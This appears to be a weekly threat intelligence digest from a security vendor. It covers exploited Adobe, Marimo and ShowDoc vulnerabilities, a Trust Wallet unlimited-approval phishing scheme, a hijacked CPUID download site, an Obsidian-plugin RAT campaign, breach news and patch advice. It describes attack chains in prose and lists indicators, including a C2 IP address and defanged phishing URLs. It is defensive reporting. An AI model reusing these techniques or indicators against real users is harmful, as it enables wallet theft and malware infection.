Executive Summary -
Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
Adobe Patches Actively Exploited CVE-2026-34621 in Acrobat and Reader Enabling Arbitrary Code Execution - On 12th April 2026, Adobe patched CVE-2026-34621, an actively exploited vulnerability affecting Adobe Acrobat DC, Acrobat Reader DC, and Acrobat 2024 on Windows and macOS. The flaw impacted versions 26.001.21367 and earlier, as well as 24.001.30356 and earlier. Haifei Li from EXPMON first identified and reported the vulnerability to Adobe on 7th April 2026.
To remediate CVE-2026-34621, Adobe released version 26.001.21411 for Acrobat DC and Acrobat Reader DC, alongside version 24.001.30362 on Windows and version 24.001.30360 on macOS for Acrobat 2024. The vulnerability is a prototype pollution flaw that requires the victim to open a malicious file. Successful exploitation allows threat actors to execute arbitrary code with the same privileges as the logged-in user on the affected system.
Threat Actor Exploits Marimo WebSocket RCE Vulnerability CVE-2026-39987 Within Hours of Disclosure - On 9th April 2026, Sysdig reported active exploitation of a critical pre-authentication remote code execution (RCE) vulnerability tracked as CVE-2026-39987, affecting Marimo WebSocket versions 0.20.4 and earlier. Successful exploitation allows threat actors to obtain a full interactive shell without authentication. Notably, unknown threat actors began exploiting the flaw within approximately 10 hours of public disclosure, despite the absence of a publicly available proof-of-concept.
To mitigate the risk posed by CVE-2026-39987, Insikt Group recommends updating Marimo WebSocket to version 0.23.0.
Threat Actors Actively Exploit Unrestricted File Upload Vulnerability CVE-2025-0520 Affecting ShowDoc - On 12th April 2026, VulnCheck reported that unknown threat actors are actively exploiting an unrestricted file upload vulnerability tracked as CVE-2025-0520, affecting the ShowDoc documentation platform versions prior to 2.8.7. Successful exploitation allows threat actors to upload arbitrary files, potentially compromising the affected system. VulnCheck observed exploitation against a US-based Canary instance, where threat actors successfully deployed a webshell.
To mitigate the risk posed by CVE-2025-0520, Insikt Group recommends updating ShowDoc to version 2.8.7 or later.
Potential Threats
Threat Actors Abuse Trust Wallet Deep Links via QR Code Phishing for Unlimited USDT Approval and Wallet Draining - On 14th April 2026, Cyfirma reported that an unidentified threat actor conducted a phishing campaign targeting Trust Wallet users, using QR code phishing distributed via Telegram to obtain unauthorised token approvals and enable fund theft. The campaign uses Trust Wallet deep links to redirect victims to phishing infrastructure mimicking legitimate transaction workflows. Cyfirma identified multiple phishing domains hosted on Netlify, along with Telegram-based delivery mechanisms, and observed characteristics consistent with a scalable operation, including affiliate tracking parameters and real-time monitoring via Telegram bots. The infection chain begins with Telegram channels distributing QR codes embedded in manipulated Trust Wallet screenshots, redirecting users to phishing domains displaying a fake "Send USDT" interface. The site initiates a wallet connection, forces a network switch to BNB Smart Chain, and requests interaction permissions, whilst the phishing script retrieves the wallet balance before loading client-side JavaScript that encodes a transaction targeting the USDT contract.
The client-side payload calls the USDT contract's ERC-20 approve() function to authorise a spender address with the maximum possible allowance, effectively granting unlimited spending permissions. Trust Wallet presents this as a routine approval, and upon user confirmation, the approval is recorded on BNB Smart Chain. The script then sends a success notification and transmits transaction data to a Telegram bot, where at least 52 transactions were observed. The approved contract can subsequently invoke transferFrom() to move funds from the wallet at any time until the permission is revoked.
Threat Actor Compromises CPUID Backend API to Serve Malware via Hijacked HWMonitor and CPU-Z Download Links - On 10th April 2026, The Register reported that a threat actor temporarily compromised CPUID's website backend API, replacing legitimate download links for HWMonitor and CPU-Z with links to trojanised installers for approximately six hours between 9th and 10th April 2026. The incident affected the download infrastructure rather than the software build pipeline, with users visiting official product pages redirected to attacker-controlled infrastructure hosted via Cloudflare R2. The trojanised installers were disguised as legitimate software and launched modified Inno Setup packages, in some cases displaying a Russian-language installer interface.
The malware deployed a fake CRYPTBASE.dll, operated largely in memory, and used PowerShell and staged .NET payloads for execution, proxying Windows NTDLL functions through a .NET assembly to evade endpoint detection and response tooling whilst retrieving additional payloads from command-and-control infrastructure. The malware also interacted with Chrome's IElevation COM interface to access or decrypt stored credentials, showing evidence of targeting browser data. The infrastructure overlapped with a March 2026 campaign distributing trojanised FileZilla installers, suggesting continued tooling and infrastructure reuse rather than an isolated incident. CPUID reportedly remediated the compromise and confirmed that legitimate binaries remained properly signed and uncompromised.
Threat Actors Abuse Obsidian Community Plugins to Deliver “PHANTOMPULSE” RAT in “REF6598” Social Engineering Campaign Targeting Crypto and Financial Sectors - On 14th April 2026, Elastic Security Labs reported that threat actors conducted a social engineering campaign dubbed "REF6598" targeting individuals in the cryptocurrency and financial sectors. The attack chain began with threat actors initiating contact via LinkedIn whilst posing as a venture capital firm, before moving conversations to Telegram where multiple controlled personas discussed financial services and cryptocurrency liquidity solutions to simulate a legitimate investment team. Targets were then instructed to access a threat actor-controlled Obsidian cloud vault presented as a business collaboration platform, where they were provided preconfigured account credentials and instructed to enable community plugin synchronisation. This allowed trojanised plugins, including ShellCommands and Hider, to sync locally and execute commands automatically when the vault opened. On Windows systems, the Shell Commands plugin launched Base64-encoded PowerShell, which downloaded a script that retrieved PHANTOMPULL, a loader that decrypted an embedded AES-256-CBC payload, reflectively loaded it into memory, and fetched the PHANTOMPULSE remote access trojan over HTTPS. Elastic detected and blocked the attack chain at an early stage before PHANTOMPULSE could execute, preventing threat actors from completing their objectives.
On macOS systems, the Shell Commands plugin executed a Base64-encoded AppleScript via osascript, establishing persistence via a LaunchAgent configured to run at login and executing an obfuscated second-stage AppleScript dropper. The dropper constructed strings at runtime, contacted hardcoded domains for command-and-control validation, and used a Telegram channel as a fallback mechanism, before sending a POST request to a resolved C2 server and piping the response into osascript for in-memory execution of additional payloads. PHANTOMPULSE itself is a 64-bit Windows RAT supporting command execution, process injection, keylogging, screenshot capture, and system telemetry collection. At the time of reporting, Elastic had not attributed the REF6598 campaign to a specific threat actor.
General News
Big tech fails to opt-out users requesting not to be tracked much of the time, new research says - Several large technology firms are placing advertising cookies in users' browsers even when those users have declined to be tracked, potentially putting them at odds with Californian law, according to new research. An audit by privacy organisation webXray, which studied Californian web traffic in March, found that 194 online advertising services ignore legally defined, globally standard opt-out signals endorsed by regulators. The California Consumer Privacy Act grants consumers the right to decline the sale of their personal data, with a mechanism known as Global Privacy Control (GPC) designed to trigger opt-outs for consumers who request them. California has previously penalised companies for ignoring GPC, fining Sephora $1.2 million in 2022 and Disney $2.75 million in February. According to the report, Google allegedly ignored consumers' opt-out requests 86% of the time, with webXray noting that "Google's failure to honour the GPC opt-out signal is easy to find in network traffic." The report includes images purportedly showing how Google's servers respond to opt-out signals with a command to create an advertising cookie. A Google spokesperson disputed the findings, stating the report is based on a "fundamental misunderstanding of how our products work."
Microsoft failed to honour opt-out requests 50% of the time, with its method for responding to opt-out signals said to mirror Google's approach, according to webXray. A Microsoft spokesperson stated that certain cookies are necessary for operational purposes and may therefore be placed even when a GPC signal is detected. Meta's opt-out failure rate was reported at 69%, with webXray alleging that the company's code "contains no check for globally standard opt-out signals." A Meta spokesperson dismissed the research as a "blatant marketing ploy that misrepresents how the Global Privacy Control setting works," arguing that the control restricts how data is shared rather than collected. Timothy Libert, who oversaw cookie privacy policy at Google until 2023, is the chief executive of webXray.
Hackers claim breach of Rockstar Games via cloud analytics platform - The ShinyHunters cybercrime group has claimed responsibility for breaching systems linked to video game developer Rockstar Games, threatening to release stolen data if a ransom is not paid. The group claimed to have accessed Rockstar's cloud-hosted data and warned the information would be leaked if the company failed to respond by 14th April. Rockstar Games confirmed that some company data had been accessed but downplayed the impact, stating that "a limited amount of non-material company information was accessed in connection with a third-party data breach" and that the incident had no impact on its organisation or players. ShinyHunters alleged the breach involved data stored in Rockstar's Snowflake cloud environment, with the intrusion occurring via Anodot, a cloud cost-monitoring and analytics platform. Attackers reportedly obtained authentication tokens from Anodot that allowed access to customer Snowflake accounts without directly breaching Rockstar or Snowflake systems. The incident follows reports of a broader supply-chain compromise involving Anodot that may have exposed sensitive data belonging to multiple Snowflake customers, with ShinyHunters claiming to have discovered authentication tokens granting access to cloud environments used by more than a dozen organisations.
ShinyHunters is a financially motivated cybercrime group active since at least 2020, having previously claimed breaches of major companies across several industries, including Match Group, the operator of dating platforms Tinder, Hinge, and OkCupid. Rockstar Games has previously faced high-profile cyber incidents; in 2022, a hacker leaked internal footage and development materials from the upcoming instalment of the Grand Theft Auto series after breaching the company's systems. Video game developers have increasingly become targets for cybercriminals seeking valuable intellectual property and corporate data, with major studios including Activision Blizzard, Bandai Namco, Capcom, CD Projekt Red, and Riot Games all having experienced cybersecurity incidents in recent years.
‘It reads like a spy novel’: $280 million theft from Drift involved North Korean fake companies - The cryptocurrency platform Drift published its full post-mortem this week describing a months-long operation by North Korean hackers that culminated in the theft of more than $280 million. The operation began six months prior, when Drift officials were approached at a cryptocurrency conference by members of a company claiming to focus on quantitative trading, later linked to UNC4736, a North Korean state-affiliated group also tracked as AppleJeus or Citrine Sleet. The individuals who made contact were technically fluent, had deep knowledge of Drift, and possessed verifiable professional backgrounds, with North Korea allegedly using intermediaries to conduct face-to-face relationship building across multiple industry conferences in multiple countries. Drift officially onboarded the company in December 2025 and January 2026, with the trading firm depositing $1 million of its own capital, and integration conversations continued through early 2026 with further in-person meetings. On 1st April, the $280 million theft was launched, after which the trading company scrubbed its entire Telegram chat with Drift. The investigation revealed several potential attack vectors, including a contributor possibly being compromised after copying a code repository shared by the trading firm, and another being urged to download a potentially malicious TestFlight application. Drift is working with law enforcement and Mandiant, all platform functions have been frozen, and the attacker's wallets flagged across multiple exchanges. Investigators linked the attack to the October 2024 theft of $50 million from crypto firm Radiant Capital based on fund movements and overlapping personas.
Michael Barnhart, who leads nation-state threat intelligence at DTEX, described the incident as intertwined with several Pyongyang-led revenue-generating schemes, noting that two of the three individuals involved appeared to be unwitting participants, whilst one likely intentionally introduced malicious code, evidenced by the deletion of his Telegram accounts after the attack. He compared the operation to the 2017 assassination of Kim Jong-nam, in which two women were unknowingly used to deploy a VX nerve agent, describing the use of cutouts as unprecedented in its sophistication. North Korea has long been linked to AppleJeus operations, attributed to the 2023 supply chain attack on 3CX, a 2022 campaign targeting over 85 users in the cryptocurrency and fintech industries, and a 2024 zero-day attack against the Chromium browser. The FBI has repeatedly warned that North Korea is earning billions through cryptocurrency targeting, with North Korean groups stealing more than $2 billion from crypto firms last year and $3 billion between 2017 and 2023, according to United Nations investigators. Barnhart called the Drift operation "the most sophisticated of all the situations," adding that "it reads like a spy novel."
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and are responsible for scoring the group's severity. These updates can be seen below.
| ● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity |
| Threat Actor | Severity Increase | Opportunity | Intent | ||||||
|---|---|---|---|---|---|---|---|---|---|
| BlueCharlie | ● Moderate | → | ● Moderate | ● 53 | → | ● 55 | ● 25 | → | ● 25 |
| UAT-10362 | NEW | → | ● Basic | NEW | → | ● 30 | NEW | → | ● 25 |
| TiMc Ransomware Group | NEW | → | ● Basic | NEW | → | ● 25 | NEW | → | ● 5 |
| Krybit Ransomware Group | ● Basic | → | ● Basic | ● 25 | → | ● 25 | ● 25 | → | ● 40 |
| miyako |
● Basic | → | ● Basic | ● 30 | → | ● 40 | ● 35 | → | ● 35 |
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.
The spikes in references are calculated over 60 days and are normalised to ensure they aren't disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
▲- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.
| Attackers | Methods | Vulnerabilities | Targets | |||||
|---|---|---|---|---|---|---|---|---|
| ShinyHunters | ▲ | JanelaRAT | ▲ | CVE-2026-32201 | ▲ | Booking.com | ▲ | |
| Hanzal | ▲ | Adwind | ▲ | CVE-2026-34621 | ▲ | Take-Two Interactive | ▲ | |
| Exitium | ▲ | JanaWare Ransomware | ▲ | CVE-2026-33825 | ▲ | Rockstar Games | ▲ | |
| Russian Hackers | ▲ |
ProxyShell |
▲ | CVE-2025-0520 | ▲ | Basic-Fit | ▲ | |
| UNC1069 | ▲ | Backdoor | ▲ | CVE-2026-26980 | ▲ | Kraken | ▲ | |
Prominent Information Security Events
Threat Actors Abuse Obsidian Community Plugins to Deliver "PHANTOMPULSE" RAT IN "REF6598" Social Engineering Campaign Targeting Crypto and Financial Sectors
Source: Insikt Group | Validated Intelligence Event
IOC: IP - 195[.]3[.]222[.]251
IOC: Hash - 70bbb38b70fd836d66e8166ec27be9aa8535b3876596fc80c45e3de4ce327980
On 14th April 2026, Elastic Security Labs reported that threat actors conducted a social engineering campaign dubbed "REF6598" targeting individuals in the cryptocurrency and financial sectors. The attack chain began with threat actors initiating contact via LinkedIn whilst posing as a venture capital firm, before moving conversations to Telegram where multiple controlled personas discussed financial services and cryptocurrency liquidity solutions to simulate a legitimate investment team. Targets were then instructed to access a threat actor-controlled Obsidian cloud vault presented as a business collaboration platform, where they were provided preconfigured account credentials and instructed to enable community plugin synchronisation. This action allowed trojanised plugins, including ShellCommands and Hider, to sync locally and execute commands automatically whenever the vault was opened, providing threat actors with a stealthy and abuse-resistant foothold within the target environment.
On Windows systems, the Shell Commands plugin launched Base64-encoded PowerShell, which downloaded a script that retrieved PHANTOMPULL, a loader that decrypted an embedded AES-256-CBC payload, reflectively loaded it into memory, and fetched the PHANTOMPULSE remote access trojan over HTTPS from threat actor-controlled infrastructure. On macOS systems, the same plugin instead executed a Base64-encoded AppleScript via osascript, establishing persistence via a LaunchAgent configured to run at login and deploying an obfuscated second-stage AppleScript dropper. The dropper constructed strings at runtime, contacted hardcoded domains for command-and-control validation, and used a Telegram channel as a fallback mechanism, before sending a POST request to a resolved C2 server and piping the response into osascript for in-memory execution of additional payloads. Elastic detected and blocked the attack chain at an early stage before PHANTOMPULSE could execute, preventing threat actors from completing their objectives.
PHANTOMPULSE is a 64-bit Windows remote access trojan supporting command execution, process injection, keylogging, screenshot capture, and system telemetry collection, representing a capable and flexible post-exploitation tool well suited to the financially motivated targeting observed in this campaign. The abuse of Obsidian's community plugin ecosystem is a notable tradecraft development, as it exploits a legitimate, trusted productivity application to achieve code execution whilst bypassing conventional security controls. The use of multiple personas across LinkedIn and Telegram, combined with a convincing business pretext sustained over time, reflects a deliberate and patient approach to target engagement consistent with financially motivated threat actors operating in the cryptocurrency and financial sectors. At the time of reporting, Elastic had not attributed the REF6598 campaign to a specific threat actor.
Threat Actors Abuse Trust Wallet Deep Links via QR Code Phishing for Unlimited USDT Approval and Wallet Draining
Source: Insikt Group | Validated Intelligence Event
IOC: URL - hxxxs://send-usdt-09-admin[.]netlify[.]app
IOC: URL - hxxxs://link[.]trustwallet[.]com/open_url?coin_id=60&url=https://swift-wallat-usdt-send.netlify.app
On 14th April 2026, Cyfirma reported that an unidentified threat actor conducted a phishing campaign targeting Trust Wallet users, using QR code phishing distributed via Telegram to obtain unauthorised token approvals and enable fund theft. The campaign uses Trust Wallet deep links to redirect victims to phishing infrastructure mimicking legitimate transaction workflows, with multiple phishing domains identified hosted on Netlify alongside Telegram-based delivery mechanisms. The activity demonstrates characteristics consistent with a scalable operation, including the use of affiliate tracking parameters and real-time monitoring via Telegram bots.
The infection chain begins with Telegram channels distributing QR codes embedded in manipulated Trust Wallet screenshots, which redirect users to phishing domains displaying a fake "Send USDT" interface. The site initiates a wallet connection, forces a network switch to BNB Smart Chain, and requests interaction permissions, whilst the phishing script performs read-only calls on the USDT contract to retrieve and display the wallet balance. Client-side JavaScript payload components are then loaded, with the configuration defining the contract and the Telegram bot, and the execution logic encoding a transaction targeting the USDT contract. The campaign's execution is deliberately structured to separate wallet connection approval from transaction submission, establishing access before completing the malicious transaction.
The client-side JavaScript payload calls the USDT contract's ERC-20 approve() function to authorise a spender address with the maximum possible allowance, effectively granting unlimited spending permissions. The Trust Wallet interface presents this as a routine approval, and upon user confirmation, the approval is recorded on BNB Smart Chain. The phishing script then displays a success notification independent of the actual transaction context, before transmitting transaction data to a Telegram bot, where at least 52 transactions were observed. Once granted, the approved contract can invoke transferFrom() to move funds from the victim's wallet at any time, with the permission remaining active until explicitly revoked.
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
- CVE-2026-34621 (Adobe) – This vulnerability can by updating Acrobat DC and Acrobat Reader DC to version 26.001.21411, alongside version 24.001.30362 on Windows and 24.001.30360 on macOS for Acrobat 2024.
- CVE-2026-39987 (Marimo WebSocket) – This vulnerability can be remediated by updating to version 0.23.0.
- CVE-2025-0520 (ShowDoc) – This vulnerability can be addressed by updating ShowDoc to version 2.8.7.
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.